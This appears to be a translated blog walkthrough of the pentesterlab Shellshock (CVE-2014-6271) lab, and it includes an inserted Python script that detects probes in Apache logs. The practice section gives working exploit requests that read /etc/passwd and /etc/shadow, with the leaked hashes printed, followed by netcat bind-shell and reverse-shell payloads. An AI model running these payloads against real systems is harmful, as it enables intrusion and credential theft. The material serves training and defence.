The Shellshock vulnerability allows attackers to execute bash commands remotely without authentication
1. The Shellshock vulnerability
A vulnerability on Linux operating systems that allows attackers to execute bash commands remotely, without going through any authentication process.
This article focuses on Shellshock CVE-2014-6271 Apache mod_cgi - Remote Exploit
Besides CVE-2014-6271, Shellshock also has variants such as CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
2. How it works
When a web server uses CGI to handle a request, it passes the information contained in the request to the handler program through environment variables. For example, the HTTP_USER_AGENT variable normally holds the name of the program that sent the request to the web server. If the request handler is a Bash script, or if it executes some command, for instance through a system call, Bash receives the environment variables passed in by the server and processes them. An attacker uses this mechanism to trigger a Shellshock attack with a specially crafted request to the server.
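As an added illustration of the mechanism just described (this is example code, not part of the original post or of pentesterlab's material), the following Python script scans Apache combined-format access log lines for the "() {" function-definition prefix that every Shellshock probe has to carry in a header the CGI handler exports as an environment variable. The sample log lines are constructed for the demo, and the regular expressions and field names are my own choices.

```python
import re

# Bash builds before the CVE-2014-6271 fix treat an environment variable whose
# value starts with "() {" as a function definition and keep parsing past the
# closing brace, executing whatever trails it. Every Shellshock probe therefore
# carries that prefix in some header the CGI handler exports
# (User-Agent -> HTTP_USER_AGENT, Referer -> HTTP_REFERER, Cookie, ...).
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Apache "combined" log format:
# ip ident user [ts] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (not taken from the original post). The first and
# third carry the probe pattern in User-Agent and Referer respectively.
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Oct/2016:09:10:16 +0000] "HEAD /cgi-bin/status HTTP/1.1" '
    '200 177 "-" "() { :;}; echo $(</etc/passwd)"',
    '10.0.0.9 - - [29/Oct/2016:09:11:02 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [29/Oct/2016:09:12:44 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 177 "() { :; }; echo vulnerable" "curl/7.35.0"',
]


def header_is_shellshock_probe(value: str) -> bool:
    """True if a single header value carries the "() {" function prefix."""
    return SHELLSHOCK_RE.search(value) is not None


def find_shellshock_probes(lines):
    """Return one record per log line that carries a Shellshock probe.

    Each record names the source IP, the requested path, the HTTP status and
    the field (user-agent or referer) that held the pattern, which is what an
    analyst needs to scope which CGI endpoints were targeted.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined-log format; skip rather than guess
        parts = m.group("req").split()
        path = parts[1] if len(parts) > 1 else m.group("req")
        for field in ("ua", "referer"):
            if header_is_shellshock_probe(m.group(field)):
                hits.append({"ip": m.group("ip"), "path": path,
                             "field": field, "status": int(m.group("status"))})
                break  # one record per line is enough
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_probes(SAMPLE_LOG):
        print(f"{hit['ip']} probed {hit['path']} via {hit['field']} "
              f"(HTTP {hit['status']})")
```

Matching on the prefix rather than on a particular payload catches the nikto check and the exploit requests shown later in this article alike, because bash only reacts to that prefix; the same test can be placed in a WAF rule in front of /cgi-bin/. Detection only tells you who sent probes; whether the host is actually affected depends on the installed bash version, so patching bash is the fix.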
II. Lab setup
Download the ISO file from https://www.pentesterlab.com/exercises/cve-2014-6271/ and install it on a virtual machine
Set up bridged or host-only networking for the virtual machine
III. Practice
Scan for the vulnerability with nikto
nikto gives the result
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
Exploit to extract information from the server:
Read the passwd file
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: <IP>\r\nConnection: close\r\n\r\n" | nc <IP> 80
Here <IP> is the IP of the vulnerable server (the virtual machine's IP)
We obtain the following information:
HTTP/1.1 200 OK
Date: Sat, 29 Oct 2016 09:10:16 GMT
Server: Apache/2.2.21 (Unix) DAV/2
root: x:0:0:root:/root:/bin/sh
lp: x:7:7:lp:/var/spool/lpd:/bin/sh
nobody: x:65534:65534:nobody:/nonexistent:/bin/false
tc: x:1001:50:Linux User,,,:/home/tc:/bin/sh
pentesterlab: x:1000:50:Linux User,,,:/home/pentesterlab:/bin/sh
Content-Length: 177
Connection: close
Content-Type: application/json
Next we read the /etc/shadow file
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/shadow)\r\nHost: 192.168.1.157\r\nConnection: close\r\n\r\n" | nc 192.168.1.157 80
HTTP/1.1 200 OK
Date: Sat, 29 Oct 2016 09:13:25 GMT
Server: Apache/2.2.21 (Unix) DAV/2
root: *:13525:0:99999:7:::
lp: *:13510:0:99999:7:::
nobody: *:13509:0:99999:7:::
tc: :13646:0:99999:7:::
pentesterlab: $1$yN4NnWo7$xfRT1i1pDL6qqX/wsE0Cx/:17103:0:99999:7:::
Content-Length: 177
Connection: close
Content-Type: application/json
From these two files, we can use password-cracking software to recover the administrator's password
Controlling the victim with netcat
Method 1: open a port on the victim machine (bind)
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p <port> -e /bin/sh\r\nHost: <IP>\r\nConnection: close\r\n\r\n" | nc <IP> 80
Then we connect to the victim machine with the command
nc <IP> <port>
(the terminal will not display any message showing that the connection succeeded)
Method 2: create a listener on our own machine and have the victim connect back (reverse)
First, we create a listener on our machine with the command
nc -l -p <port>
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc <my_IP> <my_port> -e /bin/sh\r\nHost: <IP>\r\nConnection: close\r\n\r\n" | nc <IP> 80
Huy?t MA
Source: pentesterlab